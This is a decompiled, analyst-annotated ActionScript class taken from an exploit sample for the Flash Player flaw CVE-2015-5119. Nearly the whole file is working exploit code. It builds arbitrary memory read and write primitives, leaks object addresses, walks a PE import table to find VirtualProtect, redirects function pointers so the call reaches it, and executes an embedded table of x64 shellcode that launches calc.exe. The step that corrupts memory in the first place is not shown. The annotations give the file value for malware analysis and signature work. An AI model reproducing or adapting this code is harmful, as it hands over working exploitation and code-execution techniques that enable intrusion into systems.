- ActionScript (Win x64 class) extracted from sample e747df46e21036505780f2f7e48775147d815c3591f1c91514328a36aa84b9de, associated with CVE-2015-5119
- https://helpx.adobe.com/security/products/flash-player/apsa15-03.html
- https://twitter.com/bartblaze/status/618761630806110208
- package
- {
- import flash.utils.Endian;
- class ShellWin64 extends MyClass
- {
- // Analyst note: static state shared by every memory helper in this class.
- // _v is the uint vector handed to Init(); Get64()/Set64() index it directly.
- static var _v:Vector.<uint>;
- // Set in Init() to Get64(param4, 0xFFFFF000) - param2.
- // NOTE(review): presumably the in-memory address of _v's data; confirm against the caller.
- static var _vAddr:Number;
- // Lower and upper bound of the address window currently reachable through _mc (see SetBase()).
- static var _base:Number;
- static var _baseMax:Number;
- // 64-bit value read from _v[param4 - 10] in Init() before that slot is overwritten.
- // It is not read again anywhere in this listing.
- static var _baseOld:Number;
- // Object whose position/readUnsignedInt/writeUnsignedInt are used for arbitrary reads and writes.
- // NOTE(review): MyClass2 is not shown; the members used suggest a ByteArray subclass.
- static var _mc:MyClass2;
- // Index into _v supplied by the caller of Init(); GetAddr() and FindVP() read relative to it.
- static var _mcOffs:uint;
- // 2^32, used to split and join 64-bit values held in a Number.
- static var N32:Number = Math.pow(2,32);
- // Dword table that CallVP() copies into a Vector.<uint>, whose address Exec() then calls through.
- // Two entries, 1668047203 (0x636C6163) and 1702389038 (0x6578652E), decode little-endian to the
- // ASCII text "calc.exe". NOTE(review): the remaining dwords look like x64 machine code; confirm by
- // disassembly before relying on this.
- static var _x64:Vector.<uint> = Vector.<uint>([3.296938069E9,3.96855104E9,1700221267,621054792,96,406883144,272665416,1207995208,2.336751755E9,1133195352,3.623962684E9,8949899,21495808,544902106,1222574408,126601521,2.178416968E9,1701987128,2.166453601E9,1936919416,410320961,1210335883,3.071268865E9,2055948292,3.741403164E9,1216822411,216791809,80184136,1002569544,3.33002145E9,1222674760,581761,692584448,1213223108,1342195085,410881352,3.224455255E9,3513,2.873684736E9,1746421191,3.892314112E9,9,1668047203,1702389038,826825216,1364283849,3.381217617E9,1221101897,1210117251,2.202588159E9,3.242741956E9,2.20253488E9,1499006656,1607205192,2.370329433E9,32933,2.428722432E9]);
- // Static initializer as emitted by the decompiler: it repeats the two field initializers above
- // with identical values.
- {
- N32 = Math.pow(2,32);
- _x64 = Vector.<uint>([3.296938069E9,3.96855104E9,1700221267,621054792,96,406883144,272665416,1207995208,2.336751755E9,1133195352,3.623962684E9,8949899,21495808,544902106,1222574408,126601521,2.178416968E9,1701987128,2.166453601E9,1936919416,410320961,1210335883,3.071268865E9,2055948292,3.741403164E9,1216822411,216791809,80184136,1002569544,3.33002145E9,1222674760,581761,692584448,1213223108,1342195085,410881352,3.224455255E9,3513,2.873684736E9,1746421191,3.892314112E9,9,1668047203,1702389038,826825216,1364283849,3.381217617E9,1221101897,1210117251,2.202588159E9,3.242741956E9,2.20253488E9,1499006656,1607205192,2.370329433E9,32933,2.428722432E9]);
- }
- // Constructor: only chains to the MyClass constructor. Every other member of this class is static.
- function ShellWin64()
- {
- super();
- }
- // Formatting helper: returns the decimal string for values 0..9 and "0x" followed by the
- // hexadecimal string for everything else. It is not called anywhere else in this listing.
- static function Hex(param1:Number) : String
- {
- if(param1 >= 0 && param1 <= 9)
- {
- return param1.toString();
- }
- return "0x" + param1.toString(16);
- }
- // Analyst note: stores the caller-supplied primitives and checks that they work.
- //   param1 - uint vector kept as _v
- //   param2 - offset subtracted from the value read at param4 to form _vAddr
- //   param3 - MyClass2 instance kept as _mc
- //   param4 - index into param1 kept as _mcOffs
- // Returns true when param3.length equals the value just written to param1[7], i.e. when a write
- // through the vector is visible as the other object's length.
- // NOTE(review): that is consistent with _v having been corrupted to overlap _mc's internal
- // fields before this class is entered; the corruption itself is not in this listing.
- static function Init(param1:Vector.<uint>, param2:uint, param3:MyClass2, param4:uint) : Boolean
- {
- _v = param1;
- _mc = param3;
- _mcOffs = param4;
- // 4.2949632E9 is 0xFFFFF000: the low 12 bits of the low dword are masked off before subtracting.
- _vAddr = Get64(param4,4.2949632E9) - param2;
- // The original value of the slot overwritten by Set64() below is saved here.
- _baseOld = Get64(param4 - 10);
- // 0xFFFFFFFF and 0xFFFFFFFE; slot 7 is the value compared with param3.length at the end.
- param1[6] = 4.294967295E9;
- param1[7] = 4.294967294E9;
- param3.endian = Endian.LITTLE_ENDIAN;
- Set64(param4 - 10,_vAddr);
- _base = 0;
- // 4.29496728E9 is 0xFFFFFFF0, the same window size SetBase() uses.
- _baseMax = 4.29496728E9;
- var _loc5_:uint = param3.length;
- return _loc5_ == param1[7];
- }
- // Analyst note: undoes part of Init(). It writes _vLen to the dword at _vAddr - 16 and zeroes
- // _v[6] and _v[7]. Exec() calls it after its try/catch, whether or not an error was caught.
- // NOTE(review): _vLen is not declared in this listing; presumably it is inherited from MyClass
- // and holds the vector's original length.
- static function CleanUp() : *
- {
- Set32(_vAddr - 16,_vLen);
- _v[6] = 0;
- _v[7] = 0;
- }
- // Joins two 32-bit halves into one Number: param2 * 2^32 + param1, where param1 is the low
- // dword and param2 the high dword. The multiplication is skipped when param2 is 0.
- static function Num(param1:uint, param2:uint) : Number
- {
- var _loc3_:Number = param2;
- if(_loc3_ != 0)
- {
- _loc3_ = _loc3_ * N32;
- }
- _loc3_ = _loc3_ + param1;
- return _loc3_;
- }
- // Returns the high dword of a 64-bit value held in a Number: floor(param1 / 2^32) as a uint.
- static function Hi(param1:Number) : uint
- {
- return uint(Math.floor(param1 / N32) & N32 - 1);
- }
- // Returns the low dword of a 64-bit value held in a Number: param1 masked with 2^32 - 1.
- static function Low(param1:Number) : uint
- {
- return uint(param1 & N32 - 1);
- }
- // Reads a 64-bit value from two consecutive _v slots: param1 is the low dword, param1 + 1 the high.
- // param2 is a mask applied to the low dword only; the default 4.294967295E9 (0xFFFFFFFF) keeps all bits.
- static function Get64(param1:uint, param2:uint = 4.294967295E9) : Number
- {
- return Num(_v[param1] & param2,_v[param1 + 1]);
- }
- // Writes a 64-bit value into two consecutive _v slots: low dword at param1, high dword at param1 + 1.
- static function Set64(param1:uint, param2:Number) : *
- {
- _v[param1] = Low(param2);
- _v[param1 + 1] = Hi(param2);
- }
- // Analyst note: moves the address window used by Get32/Set32/Get/Set. When param1 lies outside
- // [_base, _baseMax) the value is written to _v[4..5] and the window becomes
- // param1 .. param1 + 0xFFFFFFF0 (4.29496728E9).
- // NOTE(review): _v[4..5] presumably overlaps the data pointer of _mc, so that _mc.position is
- // then an offset from param1; the listing does not show that layout.
- static function SetBase(param1:Number) : *
- {
- if(param1 < _base || param1 >= _baseMax)
- {
- Set64(4,param1);
- _base = param1;
- _baseMax = param1 + 4.29496728E9;
- }
- }
- // Analyst note: reads one unsigned 32-bit value at absolute address param1 through _mc.
- // Addresses below 65536 (the first 64 KiB) are rejected by throwing an Error with an empty message.
- static function Get32(param1:Number) : uint
- {
- if(param1 < 65536)
- {
- throw new Error("");
- }
- SetBase(param1);
- // position is the offset of param1 from the current window base, truncated to 32 bits.
- _mc.position = uint(param1 - _base & N32 - 1);
- return _mc.readUnsignedInt();
- }
- // Analyst note: writes the unsigned 32-bit value param2 at absolute address param1 through _mc.
- // It applies the same below-65536 guard and window handling as Get32().
- static function Set32(param1:Number, param2:uint) : *
- {
- if(param1 < 65536)
- {
- throw new Error("");
- }
- SetBase(param1);
- _mc.position = uint(param1 - _base & N32 - 1);
- _mc.writeUnsignedInt(param2);
- }
- // Analyst note: reads a 64-bit value at absolute address param1 as two consecutive unsigned
- // 32-bit reads, low dword first, and joins them with Num(). Addresses below 65536 throw.
- static function Get(param1:Number) : Number
- {
- if(param1 < 65536)
- {
- throw new Error("");
- }
- SetBase(param1);
- _mc.position = uint(param1 - _base & N32 - 1);
- var _loc2_:uint = _mc.readUnsignedInt();
- var _loc3_:uint = _mc.readUnsignedInt();
- return Num(_loc2_,_loc3_);
- }
- // Analyst note: writes the 64-bit value param2 at absolute address param1 as two unsigned
- // 32-bit writes, low dword first. Addresses below 65536 throw.
- static function Set(param1:Number, param2:Number) : *
- {
- if(param1 < 65536)
- {
- throw new Error("");
- }
- SetBase(param1);
- _mc.position = uint(param1 - _base & N32 - 1);
- _mc.writeUnsignedInt(Low(param2));
- _mc.writeUnsignedInt(Hi(param2));
- }
- // Analyst note: address-leak helper. It stores param1 in the o1 member of _mc, then reads the
- // 64-bit value at _v[_mcOffs] and returns it minus 1.
- // NOTE(review): the "- 1" presumably strips a tag bit from the stored reference; the listing
- // does not establish the encoding.
- static function GetAddr(param1:Object) : Number
- {
- _mc.o1 = param1;
- return Get64(_mcOffs) - 1;
- }
- // Debug helper: returns param2 consecutive 64-bit values starting at address param1 as
- // comma-separated hexadecimal text, with "<br>" appended after every eighth value.
- // It is not called anywhere else in this listing.
- static function Dump(param1:Number, param2:uint) : String
- {
- var _loc4_:uint = 0;
- var _loc3_:* = "";
- while(_loc4_ < param2)
- {
- _loc3_ = _loc3_ + (Get(param1).toString(16) + ",");
- if(_loc4_ % 8 == 7)
- {
- _loc3_ = _loc3_ + "<br>";
- }
- _loc4_++;
- // Decompiler artifact: the parameter is re-declared here; the effect is to advance it by 8 bytes.
- var param1:Number = param1 + 8;
- }
- return _loc3_;
- }
- // Analyst note: walks an in-memory PE image with Get32()/Get() and returns the import-table entry
- // for "VIRTUALPROTECT" from the "KERNEL32.DLL" descriptor, or 0 on any failure. Every Error is
- // swallowed by the empty catch, so callers only ever see 0.
- // Values useful for signatures and triage: 23117 (0x5A4D, "MZ"), 17744 (0x4550, "PE"), and the
- // upper-case strings "KERNEL32.DLL" and "VIRTUALPROTECT" passed to MyUtils.IsEqual.
- // NOTE(review): MyUtils is not shown; the upper-case literals suggest a case-insensitive compare.
- static function FindVP() : Number
- {
- var _loc1_:* = NaN;
- var _loc2_:uint = 0;
- var _loc3_:* = NaN;
- var _loc4_:uint = 0;
- var _loc5_:Vector.<uint> = null;
- var _loc6_:* = NaN;
- var _loc7_:* = NaN;
- var _loc8_:* = NaN;
- var _loc9_:uint = 0;
- try
- {
- // Start from the pointer at _v[_mcOffs - 4], masked with 0xFFFF0000 (64 KiB aligned), minus 0x800000.
- // NOTE(review): which module that pointer belongs to cannot be told from this listing.
- _loc1_ = Get64(_mcOffs - 4,4.29490176E9) - 8388608;
- // Step backwards 64 KiB at a time, at most 240 times, until the low word reads "MZ".
- while(_loc2_ < 240)
- {
- if(uint(Get32(_loc1_) & 65535) == 23117)
- {
- break;
- }
- _loc2_++;
- _loc1_ = _loc1_ - 65536;
- }
- if(_loc2_ >= 240)
- {
- throw new Error("");
- }
- // Offset 60 (0x3C) of the DOS header holds the offset of the PE header; it must start with "PE\0\0".
- _loc3_ = _loc1_ + Get32(_loc1_ + 60);
- if(Get32(_loc3_) != 17744)
- {
- throw new Error("");
- }
- // Offsets 144 and 148 from the PE signature correspond to the import directory RVA and size
- // in a PE32+ (64-bit) header.
- _loc4_ = Get32(_loc3_ + 148);
- _loc3_ = _loc1_ + Get32(_loc3_ + 144);
- _loc5_ = new Vector.<uint>(4);
- _loc2_ = 0;
- // Iterate over the 20-byte import descriptors; the dword at +12 is the RVA of the DLL name.
- while(_loc2_ < _loc4_)
- {
- _loc8_ = _loc1_ + Get32(_loc3_ + _loc2_ + 3 * 4);
- _loc9_ = 0;
- // Copy 16 bytes of the name for the comparison.
- while(_loc9_ < 4)
- {
- _loc5_[_loc9_] = Get32(_loc8_);
- _loc9_++;
- _loc8_ = _loc8_ + 4;
- }
- if(MyUtils.IsEqual(_loc5_,"KERNEL32.DLL"))
- {
- // +0 is the lookup (name) table RVA and +16 the address table RVA of this descriptor.
- _loc6_ = Get32(_loc3_ + _loc2_);
- _loc7_ = Get32(_loc3_ + _loc2_ + 4 * 4);
- break;
- }
- _loc2_ = _loc2_ + 5 * 4;
- }
- if(_loc6_ == 0 || _loc7_ == 0)
- {
- throw new Error("");
- }
- _loc5_.length = 5;
- _loc6_ = _loc6_ + _loc1_;
- _loc2_ = 0;
- // Walk at most 384 lookup-table entries of 8 bytes each; a zero entry ends the table and is an error.
- while(_loc2_ < 384)
- {
- _loc8_ = Get(_loc6_);
- if(_loc8_ == 0)
- {
- throw new Error("");
- }
- _loc8_ = _loc8_ + _loc1_;
- _loc9_ = 0;
- // Copy 20 bytes of the hint/name entry.
- while(_loc9_ < 5)
- {
- _loc5_[_loc9_] = Get32(_loc8_);
- _loc9_++;
- _loc8_ = _loc8_ + 4;
- }
- // The third argument 2 presumably skips the 2-byte hint, and the following byte must be 0.
- // NOTE(review): MyUtils is not shown; the zero-byte check looks like an exact-length match.
- if(MyUtils.IsEqual(_loc5_,"VIRTUALPROTECT",2) && MyUtils._bArr.readByte() == 0)
- {
- // Return the 64-bit value stored in the matching address-table slot.
- return Get(_loc1_ + _loc7_ + _loc2_ * 8);
- }
- _loc2_++;
- _loc6_ = _loc6_ + 8;
- }
- }
- catch(e:Error)
- {
- }
- return 0;
- }
- // Empty variadic function. CallVP() and Exec() take its address with GetAddr(), overwrite
- // pointers reached from it, and then invoke it, so the ActionScript body is never the interesting part.
- static function Payload(... rest) : *
- {
- }
- // Analyst note: takes the address returned by FindVP() (param1) and returns _loc11_, the data
- // address of a newly allocated Vector.<uint> into which _x64 has been copied.
- // In between it saves three values reached from the Payload function object (the pointer at
- // _loc4_ and the fields at +56 and +64), replaces them, invokes Payload.apply(), and restores them.
- // NOTE(review): the function name and the param1 slots at 320 + 12/13 suggest the redirected
- // call reaches VirtualProtect for the buffer; confirm by dynamic analysis. _isDbg and _gc are
- // not declared in this listing and are presumably inherited from MyClass.
- static function CallVP(param1:Number) : Number
- {
- var _loc12_:uint = 0;
- // Payload is called twice before its address is taken.
- // NOTE(review): presumably this makes the runtime finish setting the function up.
- Payload();
- var _loc2_:Array = new Array(4);
- Payload.apply(null,_loc2_);
- var _loc3_:Number = GetAddr(Payload);
- // Pointer chain from the Payload object; the final offset differs between debug and release players.
- var _loc4_:Number = Get(Get(Get(_loc3_ + 16) + 40) + 8) + (_isDbg?288:264);
- // Original values, saved so they can be restored after the call.
- var _loc5_:Number = Get(_loc4_);
- var _loc6_:Number = Get(_loc3_ + 56);
- var _loc7_:Number = Get(_loc3_ + 64);
- var _loc8_:Number = Get(_loc5_ - 8);
- var _loc9_:uint = _x64.length;
- // Work buffer of at least 768 dwords; _loc11_ becomes the address of its element data.
- var _loc10_:Vector.<uint> = new Vector.<uint>(Math.max(768,_loc9_));
- var _loc11_:Number = GetAddr(_loc10_);
- _loc11_ = _loc11_ + (_isDbg?56:48);
- if(Get(_loc11_) < 65536)
- {
- _loc11_ = _loc11_ - 8;
- }
- _loc11_ = Get(_loc11_) + 16;
- // Keep a reference to the buffer in _gc.
- // NOTE(review): presumably so that it is not garbage-collected.
- _gc.push(_loc10_);
- // Copy 254 dwords from _loc5_ and 512 dwords from around the value it points to into the buffer.
- while(_loc12_ < 256 - 2)
- {
- _loc10_[_loc12_ + 2] = Get32(_loc5_ + _loc12_ * 4);
- _loc12_++;
- }
- var _loc13_:Number = Get(_loc5_) - 64 * 4;
- _loc12_ = 0;
- while(_loc12_ < 512)
- {
- _loc10_[_loc12_ + 256] = Get32(_loc13_ + _loc12_ * 4);
- _loc12_++;
- }
- // Patch selected slots of the copy; slots 320 + 12/13 receive param1.
- _loc10_[0] = Low(_loc8_);
- _loc10_[1] = Hi(_loc8_);
- _loc10_[2] = Low(_loc11_ + 320 * 4);
- _loc10_[3] = Hi(_loc11_ + 320 * 4);
- _loc10_[320 + 12] = Low(param1);
- _loc10_[320 + 13] = Hi(param1);
- // Replace the two fields at +56/+64 with the buffer's byte length and the constant 64.
- Set(_loc3_ + 56,_loc10_.length * 4);
- Set(_loc3_ + 64,64);
- var _loc14_:Number = GetAddr(_loc2_);
- _loc8_ = Get(_loc14_);
- // Redirect the pointer at _loc4_ into the buffer, invoke Payload, then restore everything.
- Set(_loc4_,_loc11_ + 8);
- Payload.apply(null,_loc2_);
- Set(_loc4_,_loc5_);
- Set(_loc3_ + 56,_loc6_);
- Set(_loc3_ + 64,_loc7_);
- _loc7_ = Get(_loc14_);
- Set(_loc14_,_loc8_);
- // An unchanged value at _loc14_ is treated as failure of the redirected call.
- if(_loc8_ == _loc7_)
- {
- throw new Error("");
- }
- // Only now is the _x64 table copied over the start of the buffer.
- _loc12_ = 0;
- while(_loc12_ < _loc9_)
- {
- _loc10_[_loc12_] = _x64[_loc12_];
- _loc12_++;
- }
- return _loc11_;
- }
- // Analyst note: top-level driver of this class. The sequence is FindVP(), then CallVP(), then
- // a temporary overwrite of the pointer at _loc3_ (reached from the Payload object) with the buffer
- // address, then Payload.call(null), then restoring the pointer.
- // Any Error is swallowed by the empty catch and CleanUp() runs afterwards in every case.
- // "vpAddr == 0" is the only non-empty error message in the class and is a usable string indicator.
- static function Exec() : *
- {
- var _loc1_:* = NaN;
- var _loc2_:* = NaN;
- var _loc3_:* = NaN;
- var _loc4_:* = NaN;
- var _loc5_:* = undefined;
- try
- {
- _loc1_ = FindVP();
- if(_loc1_ == 0)
- {
- throw new Error("vpAddr == 0");
- }
- // _loc2_ is the address of the buffer holding the _x64 table.
- _loc2_ = CallVP(_loc1_);
- _loc3_ = GetAddr(Payload);
- _loc3_ = Get(Get(_loc3_ + 56) + 16) + 8;
- // Save the original pointer, replace it, invoke Payload, then put the original back.
- _loc4_ = Get(_loc3_);
- Set(_loc3_,_loc2_);
- _loc5_ = Payload.call(null);
- Set(_loc3_,_loc4_);
- }
- catch(e:Error)
- {
- }
- CleanUp();
- }
- }
- }